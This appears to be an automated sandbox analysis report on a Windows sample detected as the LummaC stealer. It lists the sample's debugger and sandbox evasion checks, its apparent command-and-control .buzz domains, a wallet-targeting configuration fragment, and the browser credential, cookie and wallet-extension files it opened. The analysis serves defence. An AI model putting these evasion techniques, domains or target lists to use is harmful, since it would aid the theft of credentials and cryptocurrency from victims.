              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0C36 second address: 4BF0C45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0C45 second address: 4BF0C70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, EF7Ah 0x00000007 mov edi, 19868946h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F335931F159h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0C70 second address: 4BF0C76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0C76 second address: 4BF0C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSpecial instruction interceptor: First address: DF8D4C instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSpecial instruction interceptor: First address: DF8E63 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSpecial instruction interceptor: First address: FC1A05 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe TID: 3756Thread sleep time: -270000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe TID: 3756Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: k7T6akLcAr.exe, k7T6akLcAr.exe, 00000000.00000002.2392801868.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: k7T6akLcAr.exe, 00000000.00000003.2214194315.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000002.2392016339.0000000000A2A000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000002.2392016339.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: k7T6akLcAr.exe, 00000000.00000002.2392016339.00000000009F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: k7T6akLcAr.exe, 00000000.00000002.2392801868.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: k7T6akLcAr.exeBinary or memory string: ZqeMU
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: SICE
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: k7T6akLcAr.exeString found in binary or memory: hummskitnj.buzz
              Source: k7T6akLcAr.exeString found in binary or memory: appliacnesot.buzz
              Source: k7T6akLcAr.exeString found in binary or memory: cashfuzysao.buzz
              Source: k7T6akLcAr.exeString found in binary or memory: inherineau.buzz
              Source: k7T6akLcAr.exeString found in binary or memory: screwamusresz.buzz
              Source: k7T6akLcAr.exeString found in binary or memory: rebuildeso.buzz
              Source: k7T6akLcAr.exeString found in binary or memory: scentniej.buzz
              Source: k7T6akLcAr.exeString found in binary or memory: mindhandru.buzz
              Source: k7T6akLcAr.exeString found in binary or memory: prisonyfork.buzz
              Source: k7T6akLcAr.exe, 00000000.00000002.2393047105.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: k7T6akLcAr.exe, 00000000.00000002.2392016339.0000000000A2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: k7T6akLcAr.exe PID: 6032, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: k7T6akLcAr.exeString found in binary or memory: "simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wal
              Source: k7T6akLcAr.exeString found in binary or memory: ets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appd
              Source: k7T6akLcAr.exeString found in binary or memory: "simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wal
              Source: k7T6akLcAr.exeString found in binary or memory: "simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wal
              Source: k7T6akLcAr.exeString found in binary or memory: :"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,
              Source: k7T6akLcAr.exeString found in binary or memory: :"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,
              Source: k7T6akLcAr.exeString found in binary or memory: :"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,
              Source: k7T6akLcAr.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: k7T6akLcAr.exeString found in binary or memory: :"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
